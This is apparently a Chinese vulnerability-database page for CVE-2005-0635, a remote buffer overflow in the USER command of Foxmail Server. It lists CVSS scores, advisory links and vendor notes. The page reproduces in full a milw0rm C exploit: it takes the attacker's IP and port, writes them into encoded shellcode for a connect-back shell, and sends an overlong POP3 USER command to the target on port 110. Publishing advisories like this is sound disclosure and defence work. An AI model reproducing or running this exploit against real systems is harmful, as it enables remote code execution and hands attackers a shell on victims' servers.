CVE-2005-0635
CVSS10.0
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:46:52
NMCOES    

[原文]Buffer overflow in Foxmail Server 2.0 allows remote attackers to execute arbitrary code via a long USER command.


[CNNVD]Foxmail Server "USER"命令处理多个远程缓冲区溢出漏洞(CNNVD-200505-589)

        Foxmail Server是Windows和linux下都可以使用的邮件服务程序。
        Foxmail Server对特定命令的参数处理存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0635
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0635
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-589
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/12711
(UNKNOWN)  BID  12711
http://www.securityfocus.com/archive/1/391960
(VENDOR_ADVISORY)  BUGTRAQ  20050302 Foxmail server "USER" command Multiple remote buffer overflow
http://securitytracker.com/id?1013356
(VENDOR_ADVISORY)  SECTRACK  1013356
http://secunia.com/advisories/14145
(VENDOR_ADVISORY)  SECUNIA  14145

- 漏洞信息

Foxmail Server "USER"命令处理多个远程缓冲区溢出漏洞
危急 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        Foxmail Server是Windows和linux下都可以使用的邮件服务程序。
        Foxmail Server对特定命令的参数处理存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://fox.foxmail.com.cn/cgi/download/nt/nph-install_nt.cgi

- 漏洞信息 (854)

Foxmail 1.1.0.1 POP3 Temp Dir Stack Overflow Exploit (EDBID:854)
windows remote
2005-03-02 Verified
110 Swan
N/A [点击下载]
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#pragma comment (lib,"ws2_32")
#define PORT_OFFSET  118
#define IP_OFFSET    111

char Shellcode[] =      "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
                                       "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
                                       "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
                                       "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
                                       "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
                                       "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
                                       "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
                                       "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x99"
                                       "\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
                                       "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
                                       "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
                                       "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
                                       "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
                                       "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
                                       "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
                                       "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
                                       "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
                                       "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
                                       "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
                                       "\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
                                       "\xF9\x7E\xE0\x5F\xE0";

char szUser[]   =       "user 1231231231231234567890abcdefghijklmnopqrstuvwxyz1234567890a"
                                       "bcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123"
                                       "4567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijkklmnopqrst"
                                       "uvwxyz1234567890abcdefghijkklmnopqrstuvwxyz1234567890abcdAAAAijk"
                                       "lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abc"
                                       "defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz12345"
                                       "67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvw"
                                       "xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno"
                                       "pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg"
                                       "hijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123456789"
                                       "0abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1"
                                       "234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrs"
                                       "tuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijk"
                                       "lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abc"
                                       "defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz12345"
                                       "67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvw"
                                       "xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno"
                                       "pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg"
                                       "hijklmnopqrstuvwxyz\r\n";
unsigned char szPass[] = "pass siglos\r\n";

void help(char *program)
{
       printf ("========================================================\r\n");
       printf ("Aerofox Mail Server 1.1.0.1 POP3 Temp Dir Stack Overflow\r\n");
       printf ("========================================================\r\n\r\n");
       printf ("Usage: %s <Host> <Your IP> <Your port>\r\n", program);
       printf ("e.g.:\r\n");
       printf ("     %s 127.0.0.1 202.119.9.42 8111\r\n", program);
       printf ("\r\n  The ret address is 0x7ffa1571.\r\n");
       exit(0);
}

SOCKET Connect(char *u_host ,unsigned short u_port)
{
       WSADATA wsaData;
       SOCKET sock;
       struct hostent *r;
       struct sockaddr_in r_addr;
       int timeout = 1000;

       if(WSAStartup(0x0101,&wsaData) != 0)
       {
               printf("error starting winsock..");
               return -1;
       }
       if((r=gethostbyname(u_host))== NULL)
       {
               return -1 ;
       }
       if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))== INVALID_SOCKET)
       {
               return -1 ;
       }
       r_addr.sin_family=AF_INET;
       r_addr.sin_port=htons(u_port);
       r_addr.sin_addr=*((struct in_addr*)r->h_addr);

       if(connect(sock,(struct sockaddr *)&r_addr,sizeof(r_addr))==SOCKET_ERROR)
       {
               printf("Can't connect\n");
               exit(-1);
       }
       setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout,sizeof(timeout));
       return(sock);
}

void Disconnect(SOCKET s)
{
       closesocket(s);
       WSACleanup();
}

void tr(SOCKET s)
{
       char buff[1500];
       memset(buff, 0, sizeof(buff));
       recv(s, buff, sizeof(buff), 0);
       printf("%s\r\n",buff);
}

void SlowSend(SOCKET s, char *buf, int p)
{
       //send(s, buf, sizeof(buf),0);
       //send(s, "\r\n", 2,0);
       for(unsigned int i = 0; i < strlen(buf); i++)
       {
               Sleep(p);
               printf("%c", buf[i]);
               send(s, (char*)&(buf[i]), 1, 0);
       }
}

void main(int argc, char *argv[])
{
       /*_asm{
               mov             eax,90909091h
               dec             eax
       a:      dec             ebx
               cmp             [ebx], eax
               jnz             a
               push    ebx
               ret
       }*/
       if(argc != 4)
               help(argv[0]);

       unsigned short    port;
   unsigned long     ip;

   port = htons(atoi(argv[3]))^(USHORT)0x9999;
   ip = inet_addr(argv[2])^(ULONG)0x99999999;
   memcpy(&Shellcode[PORT_OFFSET], &port, 2);
   memcpy(&Shellcode[IP_OFFSET], &ip, 4);

       SOCKET s = Connect(argv[1], 110);
       tr(s);
       memcpy(szUser + 244, "\xCC\x90\xEB\x04\x71\x15\xFA\x7F", 8);
       memcpy(szUser + 244 + 8,  "\xB8\x91\x90\x90\x90\x48\x4B\x39\x03\x75\xFB\x53\xC3\x90\x90\x90\x90", 17);
       memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);

       SlowSend(s, (char*)szUser, 1);
       getch();
       tr(s);
       SlowSend(s, (char*)szPass, 100);
       tr(s);
       Disconnect(s);
       return;
}

// milw0rm.com [2005-03-02]
		

- 漏洞信息

14370
Foxmail Server USER Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-03-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Foxmail USER Command Multiple Remote Vulnerabilities
Unknown 12711
Yes No
2005-03-02 12:00:00 2009-07-12 10:56:00
Discovery is credited to Xin Ouyang <xouyang@fortinet.com>.

- 受影响的程序版本

Foxmail Email Server 2.0

- 漏洞讨论

Foxmail is reported prone to multiple remote vulnerabilities. These issues include a buffer overflow and a format string vulnerability. An attacker may exploit these issues to execute arbitrary code on a vulnerable computer to gain unauthorized access.

The following specific issues were identified:

It is reported that Foxmail server is prone to a remote buffer overflow vulnerability. The problem presents itself when the application receives excessive data through the USER command. It is also reported that this issue may also cause a heap overflow.

The application is also affected by a remote format string vulnerability. It is reported that this issue presents itself when the server processes a malicious USER command.

Foxmail Server For Windows version 2.0 is reported vulnerable. It is possible that Foxmail Server For Unix is affected as well.

- 漏洞利用

An exploit for the buffer overflow vulnerability was provided. A proof of concept for the heap overflow is available as well. A proof of concept for the format string issue has also be released.

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站